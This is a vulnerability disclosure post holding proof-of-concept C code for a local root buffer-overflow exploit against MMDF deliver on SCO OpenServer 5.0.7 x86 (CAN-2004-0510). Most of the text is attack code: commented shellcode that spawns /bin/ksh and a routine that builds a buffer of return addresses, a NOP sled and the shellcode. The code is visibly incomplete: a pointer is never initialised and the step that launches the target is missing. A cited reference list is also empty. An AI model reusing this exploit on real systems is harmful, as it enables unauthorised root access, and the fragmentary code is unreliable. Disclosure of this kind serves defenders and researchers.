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MMDF deliver local root exploit for SCO OpenServer 5.0.7 x86


I have written a proof of concept code for one of the various buffer overflows 
reported by Deprotect and SCO in:

The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned 
MMDF buffer overflows the name CAN-2004-0510.

 *  MMDF deliver local root exploit for SCO OpenServer 5.0.7 x86
 *  Copyright 2004 Ramon de Carvalho Valle

char shellcode[]=           /*  36 bytes                          */
    "\x68\xff\xf8\xff\x3c"  /*  pushl   $0x3cfff8ff               */
    "\x6a\x65"              /*  pushl   $0x65                     */
    "\x89\xe6"              /*  movl    %esp,%esi                 */
    "\xf7\x56\x04"          /*  notl    0x04(%esi)                */
    "\xf6\x16"              /*  notb    (%esi)                    */
    "\x31\xc0"              /*  xorl    %eax,%eax                 */
    "\x50"                  /*  pushl   %eax                      */
    "\x68""/ksh"            /*  pushl   $0x68736b2f               */
    "\x68""/bin"            /*  pushl   $0x6e69622f               */
    "\x89\xe3"              /*  movl    %esp,%ebx                 */
    "\x50"                  /*  pushl   %eax                      */
    "\x50"                  /*  pushl   %eax                      */
    "\x53"                  /*  pushl   %ebx                      */
    "\xb0\x3b"              /*  movb    $0x3b,%al                 */
    "\xff\xd6"              /*  call    *%esi                     */

main(int argc,char **argv) {
    char buffer[16384],address[4],*p;
    int i;

    printf("MMDF deliver local root exploit for SCO OpenServer 5.0.7 x86\n");
    printf("Copyright 2004 Ramon de Carvalho Valle\n\n");

    *((unsigned long *)address)=(unsigned long)buffer-256+5120+4097;

    for(i=0;i<5120;i++) *p++=address[i%4];
    for(i=0;i<8192;i++) *p++=0x90;
    for(i=0;i<strlen(shellcode);i++) *p++=shellcode[i];


Best regards,
Ramon de Carvalho Valle